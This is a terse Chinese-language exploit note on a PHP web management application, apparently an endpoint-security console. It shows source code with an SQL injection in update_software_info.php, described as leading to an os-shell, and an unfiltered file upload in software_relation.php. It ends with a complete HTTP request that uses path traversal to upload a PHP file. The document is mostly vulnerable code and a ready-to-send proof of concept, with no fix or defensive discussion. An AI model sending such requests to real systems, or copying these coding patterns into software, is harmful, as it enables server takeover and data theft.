SQL注入 文件inter/update_software_info.php
<?php require_once "./use_db.php" ;require_once "./common/functions.php" ;$return =array ();$return ["nResult" ] =0 ;$where ='where 1=1' ;if (!is_null ($_POST ['type' ]) and $_POST ['type' ] !="" ) { $id =$_POST ['type' ]; $where .=" and type=$id " ; } if (!is_null ($_POST ['key' ])) { $keyname =$_POST ['key' ]; $where .=" and keyname like '%" .$keyname ."%' " ; } $sql ="select sc_software_items.id ,version,packagesize,keyname,packagename,photoname,descri,type,param ,ty.type_name as type_name from sc_software_items left join type_software ty on ty.type_id = sc_software_items.type {$where} group by id" ;$type ='select * from type_software' ;try { $return ["software_list" ]=array (); $return ["typeList" ]=array (); $result = $mysqlDB ->query ($sql ); $res = $mysqlDB ->query ($type );
type
直接拼接,导致可报错注入,且可os-shell
任意文件上传 文件路径/inter/software_relation.php
<?php set_time_limit (0 ); date_default_timezone_set ("Asia/Shanghai" ); require_once "./use_db.php" ; session_start (); $id =$_POST ["id" ]; $toolNames =$_POST ["toolName" ]; $toolFileName =$_POST ["toolFileName" ]; $toolDescri =$_POST ["toolDescri" ]; $version =$_POST ["version" ]; $size =$_POST ['fileSize' ]; $arr_softwarekey =$_POST ['seilist' ]; $type = $_POST ['sofe_typeof' ]; $param = isset ($_POST ['param' ]) ?$_POST ['param' ] : "" ; $update_time =time (); function iconvCharset ($fields ) { $out_string = "GBK" ; $out_string .= "//IGNORE" ; if (PHP_OS == 'Linux' ) { return iconv ("UTF-8" ,"GBK//IGNORE" , $fields ); }else { return iconv ("UTF-8" ,$out_string ,$fields ); } } $gb2312_filename = $toolFileName ; $file_path = "../softmanagement/files/{$toolFileName} " ; $file_path_ = "../softmanagement/files/{$gb2312_filename} " ; $_SESSION ['name' ]=$toolFileName ; $_SESSION ['time' ]=time (); $_SESSION ['version' ]=$version ; $toolFileName =$version .'.' .$gb2312_filename ; @mkdir ("../softmanagement/download" ); $download_file = "../softmanagement/download/" ; $file_name =$download_file .$toolFileName ; $photo_name =$download_file .iconv ("UTF-8" , "GB2312" ,$_FILES ['toolImage' ]['name' ]); $sql_type ="select type_name from type_software where type_id='$type ' " ; $type_res =$mysqlDB ->query ($sql_type ); foreach ($type_res as $value ) { $type_name =$value ['type_name' ]; } try { $file_name = iconvCharset ($file_name ); $file_path = iconvCharset ($file_path ); if ($id =='' or $id ==null or $id ==0 or !isset ($_POST ["id" ])) { if (copy ($file_path ,$file_name ) || copy ($file_path_ , $file_name )) { $photo_file ='default.png' ; if ($_FILES ['toolImage' ]['tmp_name' ] != '' ){ if (move_uploaded_file ($_FILES ['toolImage' ]['tmp_name' ],$photo_name )) { $photo_file =$_FILES ['toolImage' ]['name' ]; }else { echo json_encode ("move photo file failed" ); exit (); } }
没啥好说的,没过滤后缀直接传,需要注意的是toolFileName
参数必须为一个已经存在的文件,根目录下有很多文件可供选择
POST /inter/software_relation.php HTTP/1.1 Host: 192.168.86.128:6868 User-Agent: insomnia/2021.3.0 Cookie: SKYLARa0aede9e785feabae789c6e03d=0dii85n3v7bh0ct4se9jckmee0 Content-Type: multipart/form-data; boundary=X-INSOMNIA-BOUNDARY Accept: */* Content-Length: 594 Connection: close --X-INSOMNIA-BOUNDARY Content-Disposition: form-data; name="toolFileName" ../../phpinfo.php --X-INSOMNIA-BOUNDARY Content-Disposition: form-data; name="toolName" 123.php --X-INSOMNIA-BOUNDARY Content-Disposition: form-data; name="version" 1 --X-INSOMNIA-BOUNDARY Content-Disposition: form-data; name="toolDescri" 1 --X-INSOMNIA-BOUNDARY Content-Disposition: form-data; name="fileSize" 1 --X-INSOMNIA-BOUNDARY Content-Disposition: form-data; name="toolImage"; filename="info.php" Content-Type: application/x-httpd-php <?php phpinfo();?> --X-INSOMNIA-BOUNDARY--